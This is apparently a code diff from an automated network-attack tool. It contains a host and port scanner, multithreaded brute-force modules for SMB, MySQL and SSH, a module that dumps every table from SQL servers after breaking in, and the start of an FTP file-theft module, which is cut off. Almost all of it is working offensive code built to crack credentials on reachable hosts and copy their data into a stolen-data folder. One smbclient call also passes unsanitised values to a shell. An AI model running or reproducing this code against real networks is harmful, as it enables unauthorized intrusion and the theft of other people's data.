Returns the progress of the host scan as a percentage of addresses processed.
"""
total_hosts = max(self.network.num_addresses, 1)
return (self.progress / total_hosts) * 100
def start(self):
"""
Starts the network and port scanning process.
"""
self.scan_network_and_write_to_csv()
time.sleep(7)
self.ip_data = self.outer_instance.GetIpFromCsv(self.outer_instance, self.csv_scan_file)
self.open_ports = {ip: [] for ip in self.ip_data.ip_list}
with Progress() as progress:
task = progress.add_task("[cyan]Scanning IPs...", total=len(self.ip_data.ip_list))
for ip in self.ip_data.ip_list:
progress.update(task, advance=1)
port_scanner = self.outer_instance.PortScanner(self.outer_instance, ip, self.open_ports, self.portstart, self.portend, self.extra_ports)
port_scanner.start()
self.all_ports = sorted(list(set(port for ports in self.open_ports.values() for port in ports)))
alive_ips = set(self.ip_data.ip_list)
return self.ip_data, self.open_ports, self.all_ports, self.csv_result_file, self.netkbfile, alive_ips
class LiveStatusUpdater:
"""
Helper class to update the live status of hosts and clean up scan results.
"""
def __init__(self, source_csv_path, output_csv_path):
self.logger = logger
self.source_csv_path = source_csv_path
self.output_csv_path = output_csv_path
def read_csv(self):
"""
Reads the source CSV file into a DataFrame.
"""
try:
self.df = pd.read_csv(self.source_csv_path)
except Exception as e:
self.logger.error(f"Error in read_csv: {e}")
def calculate_open_ports(self):
"""
Calculates the total number of open ports for alive hosts.
"""
try:
alive_df = self.df[self.df['Alive'] == 1].copy()
alive_df.loc[:, 'Ports'] = alive_df['Ports'].fillna('')
alive_df.loc[:, 'Port Count'] = alive_df['Ports'].apply(lambda x: len(x.split(';')) if x else 0)
self.total_open_ports = alive_df['Port Count'].sum()
except Exception as e:
self.logger.error(f"Error in calculate_open_ports: {e}")
def calculate_hosts_counts(self):
"""
Calculates the total and alive host counts.
"""
try:
# self.all_known_hosts_count = self.df.shape[0]
self.all_known_hosts_count = self.df[self.df['MAC Address'] != 'STANDALONE'].shape[0]
self.alive_hosts_count = self.df[self.df['Alive'] == 1].shape[0]
except Exception as e:
self.logger.error(f"Error in calculate_hosts_counts: {e}")
def save_results(self):
"""
Saves the calculated results to the output CSV file.
"""
try:
if os.path.exists(self.output_csv_path):
results_df = pd.read_csv(self.output_csv_path)
results_df.loc[0, 'Total Open Ports'] = self.total_open_ports
results_df.loc[0, 'Alive Hosts Count'] = self.alive_hosts_count
results_df.loc[0, 'All Known Hosts Count'] = self.all_known_hosts_count
results_df.to_csv(self.output_csv_path, index=False)
else:
self.logger.error(f"File {self.output_csv_path} does not exist.")
except Exception as e:
self.logger.error(f"Error in save_results: {e}")
def update_livestatus(self):
"""
Updates the live status of hosts and saves the results.
"""
try:
self.read_csv()
self.calculate_open_ports()
self.calculate_hosts_counts()
self.save_results()
self.logger.info("Livestatus updated")
self.logger.info(f"Results saved to {self.output_csv_path}")
except Exception as e:
self.logger.error(f"Error in update_livestatus: {e}")
def clean_scan_results(self, scan_results_dir):
"""
Cleans up old scan result files, keeping only the most recent ones.
"""
try:
files = glob.glob(scan_results_dir + '/*')
files.sort(key=os.path.getmtime)
for file in files[:-20]:
os.remove(file)
self.logger.info("Scan results cleaned up")
except Exception as e:
self.logger.error(f"Error in clean_scan_results: {e}")
def scan(self):
"""
Initiates the network scan, updates the netkb file, and displays the results.
"""
try:
self.shared_data.bjornorch_status = "NetworkScanner"
self.logger.info(f"Starting Network Scanner")
network = self.get_network()
self.shared_data.bjornstatustext2 = str(network)
portstart = self.shared_data.portstart
portend = self.shared_data.portend
extra_ports = self.shared_data.portlist
scanner = self.ScanPorts(self, network, portstart, portend, extra_ports)
ip_data, open_ports, all_ports, csv_result_file, netkbfile, alive_ips = scanner.start()
alive_macs = set(ip_data.mac_list)
table = Table(title="Scan Results", show_lines=True)
table.add_column("IP", style="cyan", no_wrap=True)
table.add_column("Hostname", style="cyan", no_wrap=True)
table.add_column("Alive", style="cyan", no_wrap=True)
table.add_column("MAC Address", style="cyan", no_wrap=True)
for port in all_ports:
table.add_column(f"{port}", style="green")
netkb_data = []
for ip, ports, hostname, mac in zip(ip_data.ip_list, open_ports.values(), ip_data.hostname_list, ip_data.mac_list):
if self.blacklistcheck and (mac in self.mac_scan_blacklist or ip in self.ip_scan_blacklist):
continue
alive = '1' if mac in alive_macs else '0'
row = [ip, hostname, alive, mac] + [Text(str(port), style="green bold") if port in ports else Text("", style="on red") for port in all_ports]
table.add_row(*row)
netkb_data.append([mac, ip, hostname, ports])
with self.lock:
with open(csv_result_file, 'w', newline='') as file:
writer = csv.writer(file)
writer.writerow(["IP", "Hostname", "Alive", "MAC Address"] + [str(port) for port in all_ports])
for ip, ports, hostname, mac in zip(ip_data.ip_list, open_ports.values(), ip_data.hostname_list, ip_data.mac_list):
if self.blacklistcheck and (mac in self.mac_scan_blacklist or ip in self.ip_scan_blacklist):
continue
alive = '1' if mac in alive_macs else '0'
writer.writerow([ip, hostname, alive, mac] + [str(port) if port in ports else '' for port in all_ports])
self.update_netkb(netkbfile, netkb_data, alive_macs)
if self.displaying_csv:
self.display_csv(csv_result_file)
source_csv_path = self.shared_data.netkbfile
output_csv_path = self.shared_data.livestatusfile
updater = self.LiveStatusUpdater(source_csv_path, output_csv_path)
updater.update_livestatus()
updater.clean_scan_results(self.shared_data.scan_results_dir)
except Exception as e:
self.logger.error(f"Error in scan: {e}")
def start(self):
"""
Starts the scanner in a separate thread.
"""
if not self.running:
self.running = True
self.thread = threading.Thread(target=self.scan)
self.thread.start()
logger.info("NetworkScanner started.")
def stop(self):
"""
Stops the scanner.
"""
if self.running:
self.running = False
if self.thread.is_alive():
self.thread.join()
logger.info("NetworkScanner stopped.")
if __name__ == "__main__":
shared_data = SharedData()
scanner = NetworkScanner(shared_data)
scanner.scan()
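
For reference, check_if_csv_scan_file_exists and update_netkb above define the netkb schema that the other action modules consume: columns MAC Address, IPs, Hostnames, Alive and Ports, with multi-valued fields joined by ';'. The row below is purely illustrative (real column names, made-up values) and shows how the connectors' execute() methods read it:

# Illustrative netkb row -- column names come from update_netkb, values are placeholders.
example_row = {
    "MAC Address": "aa:bb:cc:dd:ee:ff",
    "IPs": "192.0.2.10",
    "Hostnames": "example-host",
    "Alive": "1",
    "Ports": "21;22;445",
}
ports = example_row["Ports"].split(";")      # ['21', '22', '445'], as used by the connectors
is_alive = example_row["Alive"] == "1"       # the check applied before an action is run
print(ports, is_alive)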

actions/smb_connector.py (new file, +261 lines)

@@ -0,0 +1,261 @@
"""
smb_connector.py - This script performs a brute force attack on SMB services (port 445) to find accessible shares using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import threading
import logging
import time
from subprocess import Popen, PIPE
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from smb.SMBConnection import SMBConnection
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="smb_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SMBBruteforce"
b_module = "smb_connector"
b_status = "brute_force_smb"
b_port = 445
b_parent = None
# List of generic shares to ignore
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
class SMBBruteforce:
"""
Class to handle the SMB brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.smb_connector = SMBConnector(shared_data)
logger.info("SMBConnector initialized.")
def bruteforce_smb(self, ip, port):
"""
Run the SMB brute force attack on the given IP and port.
"""
return self.smb_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
self.shared_data.bjornorch_status = "SMBBruteforce"
success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed'
class SMBConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.smbfile = shared_data.smbfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.smbfile):
logger.info(f"File {self.smbfile} does not exist. Creating...")
with open(self.smbfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,Share,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SMB ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
def smb_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SMB service using the given credentials.
"""
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
try:
conn.connect(adresse_ip, 445)
shares = conn.listShares()
accessible_shares = []
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
try:
conn.listPath(share.name, '/')
accessible_shares.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e:
logger.error(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
conn.close()
return accessible_shares
except Exception as e:
return []
def smbclient_l(self, adresse_ip, user, password):
"""
Attempt to list shares using smbclient -L command.
"""
command = f'smbclient -L {adresse_ip} -U {user}%{password}'
try:
process = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
if b"Sharename" in stdout:
logger.info(f"Successful authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
logger.info(stdout.decode())
shares = self.parse_shares(stdout.decode())
return shares
else:
logger.error(f"Failed authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
return []
except Exception as e:
logger.error(f"Error executing command '{command}': {e}")
return []
def parse_shares(self, smbclient_output):
"""
Parse the output of smbclient -L to get the list of shares.
"""
shares = []
lines = smbclient_output.splitlines()
for line in lines:
if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
parts = line.split()
if parts and parts[0] not in IGNORED_SHARES:
shares.append(parts[0])
return shares
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
shares = self.smb_connect(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Share: {share}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SMB...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
# If no success with direct SMB connection, try smbclient -L
if not success_flag[0]:
logger.info(f"No successful authentication with direct SMB connection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in self.passwords:
progress.update(task_id, advance=1)
shares = self.smbclient_l(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"(SMB) Found credentials for IP: {adresse_ip} | User: {user} | Share: {share} using smbclient -L")
self.save_results()
self.removeduplicates()
success_flag[0] = True
if self.shared_data.timewait_smb > 0:
time.sleep(self.shared_data.timewait_smb) # Wait for the specified interval before the next attempt
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'Share', 'User', 'Password', 'Port'])
df.to_csv(self.smbfile, index=False, mode='a', header=not os.path.exists(self.smbfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.smbfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.smbfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
smb_bruteforce = SMBBruteforce(shared_data)
logger.info("[bold green]Starting SMB brute force attack on port 445[/bold green]")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
smb_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successful attempts: {len(smb_bruteforce.smb_connector.results)}")
exit(len(smb_bruteforce.smb_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

actions/sql_connector.py (new file, +204 lines)

@@ -0,0 +1,204 @@
import os
import pandas as pd
import pymysql
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SQLBruteforce"
b_module = "sql_connector"
b_status = "brute_force_sql"
b_port = 3306
b_parent = None
class SQLBruteforce:
"""
Class to handle the SQL brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.sql_connector = SQLConnector(shared_data)
logger.info("SQLConnector initialized.")
def bruteforce_sql(self, ip, port):
"""
Run the SQL brute force attack on the given IP and port.
"""
return self.sql_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed'
class SQLConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.load_scan_file()
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sqlfile = shared_data.sqlfile
if not os.path.exists(self.sqlfile):
with open(self.sqlfile, "w") as f:
f.write("IP Address,User,Password,Port,Database\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the scan file and filter it for SQL ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3306", na=False)]
def sql_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SQL service using the given credentials without specifying a database.
"""
try:
# First attempt without specifying a database
conn = pymysql.connect(
host=adresse_ip,
user=user,
password=password,
port=3306
)
# If the connection succeeds, retrieve the list of databases
with conn.cursor() as cursor:
cursor.execute("SHOW DATABASES")
databases = [db[0] for db in cursor.fetchall()]
conn.close()
logger.info(f"Successfully connected to {adresse_ip} with user {user}")
logger.info(f"Available databases: {', '.join(databases)}")
# Save the information along with the list of databases found
return True, databases
except pymysql.Error as e:
logger.error(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, []
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, port = self.queue.get()
success, databases = self.sql_connect(adresse_ip, user, password)
if success:
with self.lock:
# Add an entry for each database found
for db in databases:
self.results.append([adresse_ip, user, password, port, db])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
logger.success(f"Databases found: {', '.join(databases)}")
self.save_results()
self.remove_duplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file()
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SQL...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['IP Address', 'User', 'Password', 'Port', 'Database'])
df.to_csv(self.sqlfile, index=False, mode='a', header=not os.path.exists(self.sqlfile))
logger.info(f"Saved results to {self.sqlfile}")
self.results = []
def remove_duplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sqlfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sqlfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
sql_bruteforce = SQLBruteforce(shared_data)
logger.info("[bold green]Starting SQL brute force attack on port 3306[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
sql_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(sql_bruteforce.sql_connector.results)}")
exit(len(sql_bruteforce.sql_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

actions/ssh_connector.py (new file, +198 lines)

@@ -0,0 +1,198 @@
"""
ssh_connector.py - This script performs a brute force attack on SSH services (port 22) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import paramiko
import socket
import threading
import logging
from queue import Queue
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="ssh_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SSHBruteforce"
b_module = "ssh_connector"
b_status = "brute_force_ssh"
b_port = 22
b_parent = None
class SSHBruteforce:
"""
Class to handle the SSH brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ssh_connector = SSHConnector(shared_data)
logger.info("SSHConnector initialized.")
def bruteforce_ssh(self, ip, port):
"""
Run the SSH brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_ssh on {ip}:{port}...")
return self.ssh_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing SSHBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "SSHBruteforce"
success, results = self.bruteforce_ssh(ip, port)
return 'success' if success else 'failed'
class SSHConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
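# Note: str.contains("22") is a substring match, so entries listing ports such as 2222 or 220 will also pass this filter.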
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sshfile = shared_data.sshfile
if not os.path.exists(self.sshfile):
logger.info(f"File {self.sshfile} does not exist. Creating...")
with open(self.sshfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SSH ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
def ssh_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SSH service using the given credentials.
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(adresse_ip, username=user, password=password, banner_timeout=200) # Adjust timeout as necessary
return True
except (paramiko.AuthenticationException, socket.error, paramiko.SSHException):
return False
finally:
ssh.close() # Ensure the SSH connection is closed
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ssh_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
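"""
Queue every user/password combination for the target, then drain the queue with a pool of worker threads while a progress bar tracks the attempts.
"""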
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SSH...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.sshfile, index=False, mode='a', header=not os.path.exists(self.sshfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sshfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sshfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ssh_bruteforce = SSHBruteforce(shared_data)
logger.info("Démarrage de l'attaque SSH... sur le port 22")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing SSHBruteforce on {ip}...")
ssh_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Nombre total de succès: {len(ssh_bruteforce.ssh_connector.results)}")
exit(len(ssh_bruteforce.ssh_connector.results))
except Exception as e:
logger.error(f"Erreur: {e}")

189
actions/steal_data_sql.py Normal file
View File

@@ -0,0 +1,189 @@
import os
import pandas as pd
import logging
import time
from sqlalchemy import create_engine
from rich.console import Console
from threading import Timer
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_data_sql.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealDataSQL"
b_module = "steal_data_sql"
b_status = "steal_data_sql"
b_parent = "SQLBruteforce"
b_port = 3306
class StealDataSQL:
"""
Class to handle the process of stealing data from SQL servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.sql_connected = False
self.stop_execution = False
logger.info("StealDataSQL initialized.")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_sql(self, ip, username, password, database=None):
"""
Establish a MySQL connection using SQLAlchemy.
"""
try:
# If no database is specified, connect without selecting one
db_part = f"/{database}" if database else ""
connection_str = f"mysql+pymysql://{username}:{password}@{ip}:3306{db_part}"
engine = create_engine(connection_str, connect_args={"connect_timeout": 10})
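# Note: create_engine() is lazy and does not open a connection here; the first real connection (and any authentication failure) happens on the first query.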
self.sql_connected = True
logger.info(f"Connected to {ip} via SQL with username {username}" + (f" to database {database}" if database else ""))
return engine
except Exception as e:
logger.error(f"SQL connection error for {ip} with user '{username}' and password '{password}'" + (f" to database {database}" if database else "") + f": {e}")
return None
def find_tables(self, engine):
"""
Find all tables in all databases, excluding system databases.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Table search interrupted due to orchestrator exit.")
return []
query = """
SELECT TABLE_NAME, TABLE_SCHEMA
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA NOT IN ('information_schema', 'mysql', 'performance_schema', 'sys')
AND TABLE_TYPE = 'BASE TABLE'
"""
df = pd.read_sql(query, engine)
tables = df[['TABLE_NAME', 'TABLE_SCHEMA']].values.tolist()
logger.info(f"Found {len(tables)} tables across all databases")
return tables
except Exception as e:
logger.error(f"Error finding tables: {e}")
return []
def steal_data(self, engine, table, schema, local_dir):
"""
Download data from the table in the database to a local file.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Data stealing process interrupted due to orchestrator exit.")
return
query = f"SELECT * FROM {schema}.{table}"
df = pd.read_sql(query, engine)
local_file_path = os.path.join(local_dir, f"{schema}_{table}.csv")
df.to_csv(local_file_path, index=False)
logger.success(f"Downloaded data from table {schema}.{table} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading data from table {schema}.{table}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal data from the remote SQL server.
"""
try:
if 'success' in row.get(self.b_parent_action, ''):
self.shared_data.bjornorch_status = "StealDataSQL"
time.sleep(5)
logger.info(f"Stealing data from {ip}:{port}...")
sqlfile = self.shared_data.sqlfile
credentials = []
if os.path.exists(sqlfile):
df = pd.read_csv(sqlfile)
# Filter the credentials for this specific IP
ip_credentials = df[df['IP Address'] == ip]
# Build (username, password, database) tuples
credentials = [(row['User'], row['Password'], row['Database'])
for _, row in ip_credentials.iterrows()]
logger.info(f"Found {len(credentials)} credential combinations for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
if not self.sql_connected:
logger.error(f"No SQL connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout)
timer.start()
success = False
for username, password, database in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal data execution interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip} on database {database}")
# First connect without a database to check global permissions
engine = self.connect_sql(ip, username, password)
if engine:
tables = self.find_tables(engine)
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"sql/{mac}_{ip}/{database}")
os.makedirs(local_dir, exist_ok=True)
if tables:
for table, schema in tables:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
break
# Connect to the specific database to extract its data
db_engine = self.connect_sql(ip, username, password, schema)
if db_engine:
self.steal_data(db_engine, table, schema, local_dir)
success = True
counttables = len(tables)
logger.success(f"Successfully stolen data from {counttables} tables on {ip}:{port}")
if success:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"Error stealing data from {ip} with user '{username}' on database {database}: {e}")
if not success:
logger.error(f"Failed to steal any data from {ip}:{port}")
return 'failed'
else:
return 'success'
else:
logger.info(f"Skipping {ip} as it was not successfully bruteforced")
return 'skipped'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
def b_parent_action(self, row):
"""
Get the parent action status from the row.
"""
return row.get(b_parent, {}).get(b_status, '')
if __name__ == "__main__":
shared_data = SharedData()
try:
steal_data_sql = StealDataSQL(shared_data)
logger.info("[bold green]Starting SQL data extraction process[/bold green]")
# Load the IPs to process from shared data
ips_to_process = shared_data.read_data()
# Execute data theft on each IP
for row in ips_to_process:
ip = row["IPs"]
steal_data_sql.execute(ip, b_port, row, b_status)
except Exception as e:
logger.error(f"Error in main execution: {e}")

198
actions/steal_files_ftp.py Normal file
View File

@@ -0,0 +1,198 @@
"""
steal_files_ftp.py - This script connects to FTP servers using provided credentials or anonymous access, searches for specific files, and downloads them to a local directory.
"""
import os
import logging
import time
from rich.console import Console
from threading import Timer
from ftplib import FTP
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_ftp.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesFTP"
b_module = "steal_files_ftp"
b_status = "steal_files_ftp"
b_parent = "FTPBruteforce"
b_port = 21
class StealFilesFTP:
"""
Class to handle the process of stealing files from FTP servers.
"""
def __init__(self, shared_data):
try:
